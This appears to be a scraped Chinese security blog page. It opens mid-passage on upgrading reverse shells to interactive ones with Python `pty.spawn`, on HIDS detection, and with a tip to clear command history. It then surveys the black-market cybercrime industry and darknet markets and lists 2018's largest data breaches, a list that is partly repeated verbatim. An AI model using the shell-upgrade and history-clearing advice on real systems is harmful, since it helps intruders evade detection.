2.交互式shell:

交互式shell是shell最常见的一种,交互式shell区别非交互式shell最大的就是加载了环境变量,交互式shell的使用和在终端terminal中几乎一致。一般来说,远程命令执行反弹出来仅仅是实现了一个非交互式shell。从非交互式shell升级到交互式shell,一个最简单的方式就是用python脚本 pty.spawn(“/bin/bash”)

3. 交互式shell在实际渗透过程中未必比非交互式shell好,因为有经验的甲方都会对环境变量、shell终端加载文件如.bashrc、bash_profile等进行安全处理,直接提升到交互式shell,触发HIDS告警的可能性较高(当然并非绝对)。

(Ps:如果你使用别人的工具,反弹了shell,却不清楚是不是交互式shell,一个简单的方法就是执行history和set命令,如果都有正常返回,那你就要当心了,你可能获取了一个交互式shell,尽快清除history吧。)

做巨头生意也囤洗发水,黑产江湖你不知道的那些事

在世界经济论坛发布的《The Global Risks Report 2018》中,网络安全已经成为除自然灾害以外,最大的风险所在。据统计,2017 年黑产从业人员超 150 万,市场规模更是达到了千亿级别……

做巨头生意也囤洗发水,黑产江湖你不知道的那些事

2018年全球风险报告

网络安全已经成为除自然灾害以外,最大的风险所在。

一、全球互联网的至暗时刻

早在2016年网络安全技术高峰论坛上,全球著名信息安全专家,卡巴斯基创始者尤金•卡巴斯基曾表示,目前网络安全正处于一个黑暗时代……

做巨头生意也囤洗发水,黑产江湖你不知道的那些事

卡巴斯基公司CEO 尤金•卡巴斯基先生发表讲话

1. 网络威胁呈现几何式增长

从1986年出现的第一次网络威胁,20年间,数据显示有100万恶意软件的攻击。20年后,在2006年的短短一周内,恶意攻击数据已达到220万。而如今,仅是发现的漏洞就超过40亿,网络威胁已超过了前两年的总和……

2. 全球资产损失达千亿美元

尤金·卡巴斯基表示网络犯罪每年造成的全球损失在4千亿到5千亿美元之间,而随着全球企业和政府对数字系统的依赖日益增加,“网络攻击”已经取代“社会两极分化”成为影响未来十年经济稳定最大的风险。

全球最大的保险公司Lloyd’s of London在2017年发布报告表示,大型全球性网络攻击可能会使得全球经济平均损失530亿美元,而这一数据甚至已超过 2012年导致美国113人死亡,联合国总部受损的飓风“桑迪”(飓风“桑迪”所带来的经济损失,总计300亿至500亿美元之间)。Lloyd’sof London向全球发出警告,网络攻击带来的经济损失堪比飓风或其它自然灾难!

3. 网络威胁更加复杂

随着物联网的发展,以及人工智能技术的突破,让网络攻击形式与手段变得愈发多样。曾以为办公室系统或手机是最容易被攻击的,事实上很多连接到物联网上的设备都可能受到攻击。包括:智能家居、智能汽车、智能火车、地铁甚至一些电厂电站等,现在它们都变成最容易被攻击的目标。另外一方面,人工智能技术应用逐渐渗透到各个领域,黑产组织已实现高度还原自然人行为的技术突破,骗过传统风控体系,给政府以及企业带来致命打击。

然而讽刺的是,这位全球信息安全的领军人物,至今不用智能手机…..

做巨头生意也囤洗发水,黑产江湖你不知道的那些事

前卡巴斯基代言人 周杰伦

二、“网络黑产”,另一个平行的互联网世界

没错,不经意间,这群人的确将地下产业链玩成了“产业”,而且市场规模更是达到了千亿级别……

做巨头生意也囤洗发水,黑产江湖你不知道的那些事

源自《2017年度网络黑产威胁源研究报告》

黑产是黑色产业的简称,广义上包括贩毒、高利贷、私彩、网络诈骗等行业,狭义上是指利用互联网技术不正当获取利益的一个行业,现在提到黑产一般指狭义上的黑产。黑产一般都有交易链,通常在搜索引擎搜索不到、一般人也难以进入的暗网进行大规模交易,也会在私人网站或者交易论坛进行交易。

而作为黑产的重要地下交易变现的平台,其实暗网是深网(Deep Web)的一个子集,“暗网”一词最初由Dr.Jill Ellsworth于1994年提出。通常指只能用特殊软件、特殊授权、或对电脑做特殊设置才能连上的网络,其服务器地址和数据传输也通常是匿名、匿踪的。

根据美国Market Watch调查数据显示,目前全球范围内,存在三大黑网交易市场,分别为:Dream、Wall Street与PointMarketplace。

1. Dream市场

作为深网最古老的市场,Dream从2013年就屹立不倒,而这对于黑网来说,可以说是历史悠久了。诈骗和萧条通常会在一年内终结一家暗网市场,而Dream仍然存在,这证明其稳健强大。它接受比特币核心钱包,比特币现金和门罗币,拥有50,000个数字商品和63,000个药品目录。在“其他业务”类别中又包括:复古Air Jordan运动鞋、500欧元纸币、信用卡号码和变态色情订阅。还有一个“服务”部分,在这个部分你可以购买假身份证或针对Youtube上您特别讨厌的视频订购差评服务。只需0.8 BTC,你可以完全消失,然后以全新的身份出现。

2. Wall Street

充满恶意和双重交易的Wall Street是一个罪恶与阴谋汇集地。该网站声称拥有将近3000个供应商和400,000个客户,并接受BTC和XMR。相对于Dream而言,WallStreet的产品较少,但拥有更多的类别包括“安全与托管”,就在“欺诈”一栏边上。并非所有可以在深网上购买的东西都是非法的,比如,曾有媒体表示,在上面看到过有人卖代餐食品。

3. Point MarketplacePoint

前身为Tochka,是自2015年以来一直运行的俄罗斯DNM。它具有许多创新特性,包括秘密交收情报点,使供应商可以将产品留在某个位置,买家随后收集。该网站的正常运行时间比Wall Street和Dream的要少(三者分别为90%和97%和98%),并且在过去几天内一直处于离线状态。不过,Point的客户服务得到高度评价,并且该网站会储存你期望在深网上找到的所有常用物品。

而我们接触到更多的还是在暗网上售卖的各类互联网巨头的敏感信息,其中就包括Gmail、Facebook、Uber以及Grubhub等用户信息,售价分别为每份1美元、5.2美元、7美元、9美元……

而在上面交易的各方,因为暗网的特殊性,并不为人所知。这里面就包括巨头Facebook……

2015年从雅虎跳槽到Facebook的阿列克斯·斯塔莫斯(Alex Stamos)表示,曾经为核查用户有没有选择弱口令,公司从黑市购入黑客售卖的口令,与网站所用的加密口令进行交叉参照。

做巨头生意也囤洗发水,黑产江湖你不知道的那些事

Facebook首席安全官AlexStamos

遗憾的是,3年后东窗事发,Facebook曝出信息泄露丑闻。多家英美媒体披露一家名为“剑桥分析公司”的数据分析企业,在未经授权的情况下,获取了美国社交媒体脸书多达5000万用户的个人信息,用于软件设计以预测并影响选民投票。而在这次数据泄露事件引发Facebook内部动荡中,首席安全官AlexStamos也宣布将于8月离职。

三、“网络黑产”,一个规模达千亿级的市场

作为全球互联网黑色产业的风向标,网络“黑产”在中国的发展史极具代表性:

  • 2003年前后,互联网刚刚开始在大众中普及。QQ号被盗,几乎就是当时出现最多的网络安全事件。不过,这样的互联网安全事件当时大多以个体行为进行,其目的大多是窥探隐私等个人目的,或为了获取“靓号”给自己用,并未造成太大的社会危害;
  • 2005年到2006年前后,一批以盈利为目的、小作坊式的批量盗号团伙开始出现,盗号开始成为违法分子获取非法收入的一个重要途径;
  • 2016年之后,互联网金融、区块链等热门行业,均成为“黑产”从业者瞄准的对象。从虚拟账户、虚拟货币以及虚拟财产,转向人们的银行卡资产升级

而这个规模达千亿级的市场,更是表现出惊人的细分,其中主流的包括:薅羊毛、电信金融诈骗、养号刷单、木马病毒、网络私彩、知识盗版、搜索引擎“优化”、大流量DDoS攻击八大类。在这八大类下,又延伸细分出更多领域。

做巨头生意也囤洗发水,黑产江湖你不知道的那些事

黑产图谱

1. 木马病毒产业链:

这一产业链历史悠久,也是伴随着电脑病毒的社会化而逐渐成熟。

从最早的兴趣无意制造病毒开始,变成了:设计制造木马病毒、交易买入流量推广、传播扩散木马病毒、对中毒用户进行信息窃取、对信息及虚拟财产套现等多个链条环节,从而形成一种暴利行业。它之所以可以赢利的模式是:

  • 最早的制造者开发并制作具有盗号、远程控制、自动传播等功能的木马病毒,并根据时事热点设计这类木马的传播方式、触发环境,并及时针对杀毒软件开发出免杀功能,及时更新并维护;
  • 提供流量交易环节的人比较复杂,有网络行业的内鬼、有无良站长,也有黑客,他们会通过各种手段实施“挂马”为木马病毒提供传播与存在的平台及流量;
  • “包马人”是这一产业链的核心,他们对上购买木马病毒,对下采购网络流量,实施网络“挂马”之后,开始从中窃取收获各类有用信息并进行整理,主要是各种实名信息、隐私信息以及各类网络帐号以及帐号内的虚拟财产;
  • 最后就是变现环节,实际上许多正规企业以及互联网品牌都有可能涉及这一块。他们会以“大数据分析”为由,采购各类来自于这里的个人隐私信息。也有更多的会是一些诈骗团队甚至犯罪团伙,采购了此类信息,然后进行各种诈骗活动或者是欺骗式营销;

变种与扩展:

这一黑色产业链中,也有从具体的木马病毒之外,通过人工网上钓鱼或者是设计的程序进行撞库尝试等手法,同样进行各类盗取帐号的行为,然后再进行整理、“洗号”等等手法,最后再出售变现;

最近由于苹果设备的流行,更有研究利用Apple ID的管理规则为被盗iPhone进行解锁服务的等等,都大致可以属于这一大类产业链中。

2. 养号刷单产业链:

这一产业链包括:养号、刷单与利益变现这三个主要环节。

养号这一块有两个来源,一是通过网络招募人来参加,只是这类号的平台非常分散,质量参差不齐,而且也难以统一调度,越来越不被重视。

而眼下真正能够形成市场的是通过定制开发的程序甚至是专门设备,可以批量拥有大批的手机号、指定系统的帐号甚至是能拥有一定权限与层别的帐号。

然后以这些帐号按照指定规则去生成所需要的相关数据与指标,最后拿这一结果来兑换最终的收益;

虽说是流程相似,但是在具体的实施操作中,会根据刷单的目的分为数据刷量服务、奖励补贴盈利以及敲诈勒索等多种方向:

  • 数据刷量服务:多服务于淘宝卖家、APP或自媒体号运营者以及眼下到处热门的投票评选活动的参加对象。他们或者想提升自已的排名、名次、形象,或者需要一定的对外展示数据。根据不同平台对于反刷量的技术限制,这类服务都会有对应的解决方案,其收费标准也不一样;
  • 奖励补贴盈利:做这一类工作的也称羊毛党。主要是针对电商平台、商家促销、媒体自身有奖推广等活动,研究其规则漏洞或规律,以大量的养号、密集的操作以及快速的技术应对,从中赚取大量的奖品、兑换券、优惠券甚至是直接的返利金额,再将不同收益通过相关渠道进行变现;
  • 敲诈勒索:最早的是电商平台上的职业差评师。它们会把手中的号养成非常具有说服力的用户帐号,然后再研究各个大型平台的管理规则,有针对性地利用这些平台的惩罚机制,大规模发起各种差评、投诉以及恶意评价行为,借此逼迫被差评对象支付相应的赔偿或费用,并从中盈利;

变种与扩展:

正规的刷单平台,当然只是赚取中间的差价,或者被他们包装成为管理费。但是在现实中,更会有许多平台最终会直接吞掉刷单带来的所有收益,甚至根本就是假装成刷单平台,利用大家对这一黑色产业链的基本认知,骗人加入,通过各种方法收费或拿到收入后直接跑路,实质沦为直接的诈骗行为;

此外,网络上也经常介绍的游戏装备低价代购、低价代充值等等黑产业链,利用的是苹果公司或其它平台公司的退款漏洞,这是属于这一条里的变种;还有一些代收验证码、代注册帐号等,也是这一类里羊毛党里的变种;

3. 流量劫持产业链:

这是最具互联网特质的黑色产业链。

因为网络企业大多都离不开流量,无论哪个行业、哪个品牌,都需要各种访问量、展示量。依赖于广告营收的行业更是离不到高流量的支撑。

那么,除了常规的广告推广与各种引导之外。通过一些不光彩的技术手段,对正常网民上网的访问流量进行劫持、误导甚至是替换,就有了非常大的应用市场;

  • 有直接在不同电信服务商内部的员工与技术人员,私自进行网络协议层面的恶意解析,在确保劫持概率在正常人不易发觉的前提下,将原本是访问A的流量故意解析劫持到B处去,再向B收取高额的流量推广费用;
  • 有黑客或木马病毒的制造者,通过攻击用户家里的路由器或者某些小区、单位里的相关网络设备,从而掌握一大批能够被自己所控制的“肉机”设备,然后针对不同用户的需求,直接将这里所能拥有的一定流量进行劫持后出卖;
  • 更有一些小品牌的路由器厂家,也有各类杂牌电脑、山寨手机,都会在它们的硬件设备内部,留有后门;又或者会在产品内加入一些软件层面的误导与诱导,从而可以根据市场上的业务需求,可以随时开关、启动流量的劫持功能;

在这一产业中,也会有一些灰色部分。

比如说某些打着安全监控名义的软件,某些打着网址导航旗号的产品,也有直接做浏览器、搜索引擎的软件方。

会以各种擦边球,诱导用户在指定情况下进入它们的页面。这本质仍然是一种劫持。然后再把劫持下来的流量变卖给出价的一方;

4. 网络私彩产业链:

由于国内至今为止都未对网络彩票开放牌照申请,因此,凡是在网络上开展彩票业务的,均属于黑色产业。

简单来说,网络私彩其开彩的数据,无论是声称来源于国内的福彩体彩,还是说同步于国外的知名彩票网站,这些都不具备任何技术监控与公平保证。当然更多的就是开设私彩方自己所提供的盘口;

私彩最大的问题就在于,没有任何授权许可部门以及监管力量。

比如说,某些自称同步于国内体彩与福彩数据的站点。对方根本就没有真实出票,这被叫做“吃票”。

而万一有人中了不大的奖金,私彩站也就自己出了,这与购买费用来比,是小巫见大巫。而万一有人中了大奖金,私彩站也就直接卷钱跑路,大不了改头换脸再来;

稍微正规一点的私彩站,实际采取的是非法赌场的思路,它们看起来似乎更讲究信用,实际上却是“放长钱钓大鱼”,采取的是培养重度用户的策略,最早是分析并发现有价值的用户,然后通过小奖诱惑,让他们步步入局,但是在整个过程之中,所有的中奖率都是被它们完全控制的;

5. 知识盗版产业链:

这一条黑色产业链的历史更为悠久,衍生发展的也非常之多。

主要包括有盗版影视网站、盗版书籍阅读、盗版论文检索服务、还有大家更熟悉的游戏私服(盗版游戏)。其主要参与环节包括源数据窃取(非法翻录、盗窃、复制、破解)、非法站点建立及维护、收费或流量变现。

这类站点从最早的互联网上遍地都有,到目前的躲躲藏藏,但其背后的利润率,却随着知识产权的水涨船高而变得越来越丰厚;

6. 电信金融诈骗产业链

这一类大家更熟悉了,之前主要基于电话手机进行,之后随着QQ、微信的普及,开始在互联网上漫延。

主要由群发信息撒网、客服接听收线、钓鱼诱导或直接诈骗、钱款到帐后快速转移等多个环节密切配合。

这类产业链的手法不断更新换代,其核心就是利用人的贪念、色欲、胆小及人情弱点。有冒充公检法警、有冒充家人亲友、有冒充领导客户、有冒充名人大腕,虽然花样百出,但均属同一类型;

7. 黑帽SEO

黑帽seo,手法不符合主流搜索引擎发行方针规定。黑帽SEO获利主要的特点就是短平快,为了短期内的利益而采用的作弊方法。

目前,白帽seo与黑帽seo没有一个精准的定义。笼统来说,所有使用作弊手段或一些可疑手段(如博客作弊、网页劫持、挂黑链、垃圾链接,隐藏网页、蜘蛛池页面引流等)的都可称为黑帽SEO。

8. 大流量DDoS攻击

DDOS(Distributed Denial of Service),中文全称分布式拒绝服务,就是借助多台计算机作为平台来攻击服务器的一种方式的统称,DDOS攻击还包括 CC攻击、NTP攻击、SYN攻击、DNS攻击等。遭受DDOS攻击的网站会出现:网站无法访问、访问提示“server unavailable”、服务器CPU使用率100%、内存高占用率。

通俗一点,类似于电影里面经常出现的桥段,黑势力为了获取保护费,组织大量社会闲散人员恶意占座,导致个体商户无法正常经营。而这一手段,对受攻击企业来说,其危害可能是毁灭性的。也是目前最强大、最难防御的攻击之一。

四、专家意见:技术创新、人才培养和政府合作

针对上面一系列问题,目前安全圈还未有一个趋近完美的解决方案。Magiccc这里就搬运尤金·卡巴斯基的意见,因为觉得这个思路是当前看到最为靠谱的论断:

1. 技术创新

新技术在信息安全领域的应用,这个是源动力。一些新的技术、新的创新,会逐渐应用在企业信息安全平台建设中。但是这需要时间,要很久才能够把信息安全技术整合在关键的技术上,可能未来的五六年后才会发酵。到那时,网络安全的黑暗时代,就像曲线一样会滑到谷底,必将会被终结(Magiccc始终觉得这是大佬们安慰客户爸爸的说法)

2. 人才创新

如果说技术创新是信息安全领域突破的源动力,那么人才创新则是这一切的源动力。世界各国要花很长的时间才能让IT人员变成信息安全类的专家。大佬说的很对,目前信息安全这块的人才,可以说已关乎到一个企业未来能走多远。

3. 政府合作

黑产背后都是一群人,针对这群人,仅凭企业、服务商以及政府中的一个,可以说很难应对。但是,如果三方合作,将获得意想不到的效果。目前,互联网巨头们已尝到甜头,加紧了与政府的合作与联系。

最后,还是想说,信息安全的攻与防将是一场持久战,我们均在其中,唯有重视安全建设,不断技术创新才有可能在黑产组织攻击之前做好防御,抵御潜在威胁。

回顾|2018上半年十大数据泄露事件

2018年才只过去了一半,但是已经被报道的一些数据泄露的规模是令人震惊的。你认为Facebook是最大的一个吗?请再猜一次。

回顾|2018上半年十大数据泄露事件

对于信息安全来说,六个月可以说是一段很长的时间,因此在2018年上半年出现了大量的数据泄露事件,也就不足为奇了。以下是我们汇总的2018年至今被披露的十起规模较大的数据泄露事件,其中包括事件的故事本身以及遭泄露数据的数量。

一、2018上半年十大数据泄露事件

10. Saks和 Lord & Taylor

回顾|2018上半年十大数据泄露事件

  • 泄露数据500万条
  • 披露日期:2018年4月3日

3月底,安全公司Gemini Advisory偶然发现了一个来自JokerStash黑客集团发布的公告,宣称已出售有关500万张被盗信用卡和借记卡的数据。在各种金融机构的协助下,Gemini Advisory公司对这些交易进行了追踪,并最终将这些交易归因于Saks Fifth Avenue和Lord&Taylor的系统入侵。两家百货公司的共同所有者Hudson Bay在了解到这一事件之后,采取了补救措施。但对于Bernadette Beekman来说,这还远远不够,他于2018年4月代表在2017年3月至2018年3月的黑客入侵期间在Lord&Taylor商店使用支付卡消费的所有客户提起了集体诉讼。在她的诉讼中,Beekman称Lord&Taylor“未能遵守安全标准,并在用于保护其客户的财务信息和其他隐私信息的安全措施上‘偷工减料’,而原本这些安全措施本可以防止或减轻安全漏洞所带来的影响。”

9. PumpUp

回顾|2018上半年十大数据泄露事件

  • 泄露数据600万条
  • 披露日期:2018年5月31日

5月31日,ZDNet报道称,安全研究员Oliver Hough联系他们说发现了一台暴露在互联网上的后端服务器,并且没有得到密码。该服务器属于健身应用程序PumpUp,它使得任何能够找到它的人都能访问大量的敏感用户数据,包括用户输入的健康信息、照片以及用户之间发送的私人消息。暴露的数据还包含Facebook访问令牌,在某些情况下还包含未加密的信用卡数据,如卡号、到期日期和信用卡验证值。

当ZDNet与PumpUp取得联系时,该公司并没有做出回应,但它确实悄悄地对服务器实施了保护措施。目前尚不清楚该资产在受到保护之前,已经暴露了多长的时间。

8. Sacramento Bee

回顾|2018上半年十大数据泄露事件

  • 泄露数据1950万条
  • 披露日期:2018年6月7日

今年2月,一名匿名攻击者截获了由Sacramento Bee拥有并运营的两个数据库。其中一个IT资产包含加利福尼亚州州务卿提供的加州选民登记数据,而另一个则存储了用户为订阅该报刊而提供的联系信息。在截获了这些资源之后,攻击者要求支付赎金以换取重新获得对数据的访问权限。Sacramento Bee最终拒绝了这一要求,并删除了数据库,以防止在将来这些数据库在被利用来进行其他更多的攻击。

根据Sacramento Bee的说法,这起黑客攻击事件共暴露了5.3万名订阅者的联系信息以及1940万加州选民的个人数据。

7. Ticketfly

回顾|2018上半年十大数据泄露事件

  • 泄露数据超过2700万条
  • 披露日期:2018年6月7日

5月31日,Ticketfly遭遇了一次攻击,导致音乐会和体育赛事票务网站遭到破坏,并离线和中断一周。据报道,此次攻击事件背后的黑客先是警告Ticketfly存在一个漏洞,并要求其支付赎金。当遭到该公司的拒绝后,黑客劫持了Ticketfly网站,替换了它的主页,用一个包含2700万个Ticketfly账户相关信息(如姓名、家庭住址、电子邮箱地址和电话号码等,涉及员工和用户)的页面。

6. Panera

回顾|2018上半年十大数据泄露事件

  • 泄露数据3700万条
  • 披露日期:2018年4月2日

4月2日,安全研究员Dylan Houlihan联系了调查信息安全记者Brian Krebs,向他讲述了他在2017年8月向Panera Bread报告的一个漏洞。该漏洞导致Panerabread.com以明文泄露客户记录,这些数据可以通过自动化工具进行抓取和索引。Houlihan试图向Panera Bread报告这个漏洞,但他告诉Krebs,他的报告被驳回了。在此后的八个月里,Houlihan每个月都会检查一次这个漏洞,直到最终向Krebs披露。随后,Krebs在他的博客上公布了这些细节。在Krebs 的报告发布后,Panera Bread暂时关闭了起网站。

尽管该公司最初试图淡化此次数据泄露事件的严重程度,并表示受到影响的客户不到1万人,但据信真实数字高达3700万。

5. Facebook

回顾|2018上半年十大数据泄露事件

  • 泄露数据至少8700万条(尽管可能还有更多)
  • 披露日期:2018年3月17日

谁能忘记2018年3月令人震撼的Facebook数据泄露丑闻?当时,有报道称,一家名为Cambridge Analytica的数据分析公司通过一个应用程序收集了5000万Facebook用户的个人信息,该应用程序详细描述了用户的个性、社交网络以及在平台上的参与度。尽管Cambridge Analytica公司声称它只拥有3000万用户的信息,但经过Facebook的确认,最初的估计实际上很低。今年 4月,该公司通知了在其平台上的8700万名用户,他们的数据已经遭到泄露。

不幸的是,随着对Facebook应用程序更深入的审查,看起来Cambridge Analytica丑闻可能只是冰山一角。6月27日,安全研究员Inti De Ceukelaire透露了另一个名为Nametests.com的应用程序,它已经暴露了超过1.2亿用户的信息。

4.  MyHeritage

回顾|2018上半年十大数据泄露事件

  • 泄露数据超过9200万条
  • 披露日期:2018年6月4日

一名安全研究员于6月4日联系了在线家谱平台MyHeritage的首席信息安全官,并透露他们在公司外的私人服务器上找到了一个标有“myheritage”的文件。在检查文件后,MyHeritage的官员确认该资产包含了在2017年10月26日之前已注册MyHeritage的所有用户的电子邮箱地址。该公司发布的一份声明称,由于MyHeritage依赖第三方服务提供商来处理会员的付款,因此它也包含了他们的哈希密码,但不包含支付信息。由于该服务将家谱和DNA数据存储在与存储电子邮箱地址的服务器不同的服务器上,因此MyHeritage表示没有理由相信这些信息已经被暴露或受到损坏。

3. Under Armour

回顾|2018上半年十大数据泄露事件

  • 泄露数据5亿条
  • 披露日期:2018年5月25日

3月25日,Under Armour获悉有人未经授权访问了MyFitnessPal平台,这是一个用于跟踪用户饮食和锻炼情况的平台。美国全国广播公司财经频道(CNBC)在当时报道说,负责此次黑客入侵的犯罪分子访问了用户的用户名、电子邮件地址和哈希密码。但没有暴露用户的付款信息,因为Under Armour对这些数据进行了分别处理。同时,它也没有损害社会安全号码或驾驶执照号码,因为服装制造商表示它并不会收集此类数据。

据信,超过1.5亿MyFitnessPal用户的信息在数据泄露中受到了损害。

2. Exactis

回顾|2018上半年十大数据泄露事件

  • 泄露数据超过4亿条
  • 披露日期:2018年6月26日

安全研究员Vinny Troia在2018年6月发现,总部位于佛罗里达州的市场营销和数据聚合公司Exactis已将一个数据库暴露在可公开访问的服务器上。该数据库包含2TB的信息,其中包括数亿美国人和企业的详细信息。在撰写本文时,Exactis尚未确认受此事件影响的确切人数,但Troia表示他能够找到近3.4亿条个人记录。他还向Wired证实,此事件暴露了消费者的电子邮箱地址、实际地址、电话号码以及一系列的其他个人信息,在某些情况下包括极其敏感的细节,如孩子的姓名和性别。

1. Aadhaar

回顾|2018上半年十大数据泄露事件

  • 泄露数据11亿条
  • 披露日期:2018年1月3日

今年1月份,论坛报业集团(Tribune News Service)的记者为WhatsApp上匿名卖家提供的一项出售登录凭证的服务支付了500卢比。通过这项服务,记者可以输入任何一个Aadhaar号码(一个12位的唯一标识符,每个印度公民会使用到它)检索印度唯一身份识别管理局(UIDAI)存储的关于被查询公民的诸多类型的信息。这些数据包括姓名、住址、照片、电话号码和电子邮箱地址。在向卖家额外支付300卢比的费用后,任何人都可以通过该软件打印某个Aadhaar号码归属者的身份证。

据信,这起数据泄露事件已经损害了在印度注册的11亿公民的个人信息。

二、其他值得注意的数据泄露事件

1. Strava

2017年11月,健身追踪应用程序Strava有意发布了一份包含1300万用户活动轨迹的“热图”。这张地图让我们了解了世界各地的人们是如何利用Strava来实现他们的健身目标的。但正如Bleeping Computer在1月底报道的那样,它也起到了意想不到的作用。联合冲突分析研究所(Institute for United Conflict analyst)的分析师Nathan Ruser于2018年1月发现,该地图显示了军事基地的位置。这是通过在已知军事设施所在的偏远地区展示人们的身体活动来发现的,其中包括美军基地以及土耳其和俄罗斯基地。

2. Health South East RHF

今年年初,挪威卫生安全部门HelseCERT检测到了异常的计算机活动。它最终将这种可疑行为追溯到了作为挪威四大区域医疗保健组织之一的Health South East RHF。根据Security Affairs的报道,HelseCERT发现这起攻击是由一群“专业的”和“高端的”攻击者发起的。

在HelseCERT披露此事件后,挪威卫生与护理部澄清说,该国采取了各种安全措施来解决这一问题。

受攻击影响的人数确切人数尚不清楚。但考虑到Health South East RHF的覆盖范围,可能有290万人(超过挪威总人口的一半)成为了事件的受害者。

3. [24]7.ai

4月4日,西尔斯控股公司(Sears Holding Corporation)和达美航空公司(Delta Airlines)都公布了属于数十万客户数据遭泄露的消息。这些数据是通过[24]7.ai的数据泄露而暴露出来的,这是一种提供在线聊天支持的第三方服务。

根据达美航空的声明,这起黑客入侵事件被认为发生在2017年9月26日至2017年10月12日期间,可能泄露了信用卡信息,但受影响的客户数量不详。该航空公司强调,没有其他信息(如护照、身份证或SkyMiles信息)受到影响。西尔斯估计,可能有少于10万名客户的信用卡信息在此次黑客入侵中被曝光。 一天后,零售商百思买(Best Buy)宣布,其一小部分客户可能也受到了此次事件的影响。

4. Orbitz

3月1日,Orbitz 发现 有人未经授权访问了它的一个遗留的旅行预订平台。这家在线旅行社认为,攻击者有能力查看某些敏感信息,包括客户姓名、出生日期、电话号码、电子邮箱地址、帐单地址、性别和支付卡信息。但没有证据表明这一事件暴露了客户的护照、旅行路线或社会安全号码。

根据彭博(Bloomberg)报道,黑客可能在2017年10月1日至2017年12月22日期间访问了88万名客户的支付卡详细信息。

三、令人不安的上半年

根据身份盗窃资源中心(ITRC)的2017年数据泄露总结报告,在2018年第一季度和第二季度遭泄露数据的数量已经超过了2017年全年遭泄露数据数量的总和。值得注意的是,本文所提供的数据泄露事件列表远远谈不上全面。在2018年上半年发生了许多其他的数据泄露事件,这意味着遭泄露数据的数量实际上要多得多。不过,也只有时间才能够证明这是否属实。

2018上半年规模最大的十起数据泄露事件

2018上半年规模最大的十起数据泄露事件

2018年才只过去了一半,但是已经被报道的一些数据泄露的规模是令人震惊的。你认为Facebook是最大的一个吗?请再猜一次。

对于信息安全来说,六个月可以说是一段很长的时间,因此在2018年上半年出现了大量的数据泄露事件,也就不足为奇了。以下是我们汇总的2018年至今被披露的十起规模较大的数据泄露事件,其中包括事件的故事本身以及遭泄露数据的数量。

10) Saks和 Lord & Taylor

2018上半年规模最大的十起数据泄露事件

  • 泄露数据500万条
  • 披露日期:2018年4月3日

3月底,安全公司Gemini Advisory偶然发现了一个来自JokerStash黑客集团发布的公告,宣称已出售有关500万张被盗信用卡和借记卡的数据。在各种金融机构的协助下,Gemini Advisory公司对这些交易进行了追踪,并最终将这些交易归因于Saks Fifth Avenue和Lord&Taylor的系统入侵。两家百货公司的共同所有者Hudson Bay在了解到这一事件之后,采取了补救措施。但对于Bernadette Beekman来说,这还远远不够,他于2018年4月代表在2017年3月至2018年3月的黑客入侵期间在Lord&Taylor商店使用支付卡消费的所有客户提起了集体诉讼。在她的诉讼中,Beekman称Lord&Taylor“未能遵守安全标准,并在用于保护其客户的财务信息和其他隐私信息的安全措施上‘偷工减料’,而原本这些安全措施本可以防止或减轻安全漏洞所带来的影响。”

9)PumpUp

2018上半年规模最大的十起数据泄露事件

  • 泄露数据600万条
  • 披露日期:2018年5月31日

5月31日,ZDNet报道称,安全研究员Oliver Hough联系他们说发现了一台暴露在互联网上的后端服务器,并且没有得到密码。该服务器属于健身应用程序PumpUp,它使得任何能够找到它的人都能访问大量的敏感用户数据,包括用户输入的健康信息、照片以及用户之间发送的私人消息。暴露的数据还包含Facebook访问令牌,在某些情况下还包含未加密的信用卡数据,如卡号、到期日期和信用卡验证值。

当ZDNet与PumpUp取得联系时,该公司并没有做出回应,但它确实悄悄地对服务器实施了保护措施。目前尚不清楚该资产在受到保护之前,已经暴露了多长的时间。

8) Sacramento Bee

2018上半年规模最大的十起数据泄露事件

  • 泄露数据1950万条
  • 披露日期:2018年6月7日

今年2月,一名匿名攻击者截获了由Sacramento Bee拥有并运营的两个数据库。其中一个IT资产包含加利福尼亚州州务卿提供的加州选民登记数据,而另一个则存储了用户为订阅该报刊而提供的联系信息。在截获了这些资源之后,攻击者要求支付赎金以换取重新获得对数据的访问权限。Sacramento Bee最终拒绝了这一要求,并删除了数据库,以防止在将来这些数据库在被利用来进行其他更多的攻击。

根据Sacramento Bee的说法,这起黑客攻击事件共暴露了5.3万名订阅者的联系信息以及1940万加州选民的个人数据。

7)Ticketfly

2018上半年规模最大的十起数据泄露事件

  • 泄露数据超过2700万条
  • 披露日期:2018年6月7日

5月31日,Ticketfly遭遇了一次攻击,导致音乐会和体育赛事票务网站遭到破坏,并离线和中断一周。据报道,此次攻击事件背后的黑客先是警告Ticketfly存在一个漏洞,并要求其支付赎金。当遭到该公司的拒绝后,黑客劫持了Ticketfly网站,替换了它的主页,用一个包含2700万个Ticketfly账户相关信息(如姓名、家庭住址、电子邮箱地址和电话号码等,涉及员工和用户)的页面。

6)Panera

2018上半年规模最大的十起数据泄露事件

  • 泄露数据3700万条
  • 披露日期:2018年4月2日

4月2日,安全研究员Dylan Houlihan联系了调查信息安全记者Brian Krebs,向他讲述了他在2017年8月向Panera Bread报告的一个漏洞。该漏洞导致Panerabread.com以明文泄露客户记录,这些数据可以通过自动化工具进行抓取和索引。Houlihan试图向Panera Bread报告这个漏洞,但他告诉Krebs,他的报告被驳回了。在此后的八个月里,Houlihan每个月都会检查一次这个漏洞,直到最终向Krebs披露。随后,Krebs在他的博客上公布了这些细节。在Krebs 的报告发布后,Panera Bread暂时关闭了起网站。

尽管该公司最初试图淡化此次数据泄露事件的严重程度,并表示受到影响的客户不到1万人,但据信真实数字高达3700万。

5)Facebook

2018上半年规模最大的十起数据泄露事件

  • 泄露数据至少8700万条(尽管可能还有更多)
  • 披露日期:2018年3月17日

谁能忘记2018年3月令人震撼的Facebook数据泄露丑闻?当时,有报道称,一家名为Cambridge Analytica的数据分析公司通过一个应用程序收集了5000万Facebook用户的个人信息,该应用程序详细描述了用户的个性、社交网络以及在平台上的参与度。尽管Cambridge Analytica公司声称它只拥有3000万用户的信息,但经过Facebook的确认,最初的估计实际上很低。今年 4月,该公司通知了在其平台上的8700万名用户,他们的数据已经遭到泄露。

不幸的是,随着对Facebook应用程序更深入的审查,看起来Cambridge Analytica丑闻可能只是冰山一角。6月27日,安全研究员Inti De Ceukelaire透露了另一个名为Nametests.com的应用程序,它已经暴露了超过1.2亿用户的信息。

4) MyHeritage

2018上半年规模最大的十起数据泄露事件

  • 泄露数据超过9200万条
  • 披露日期:2018年6月4日

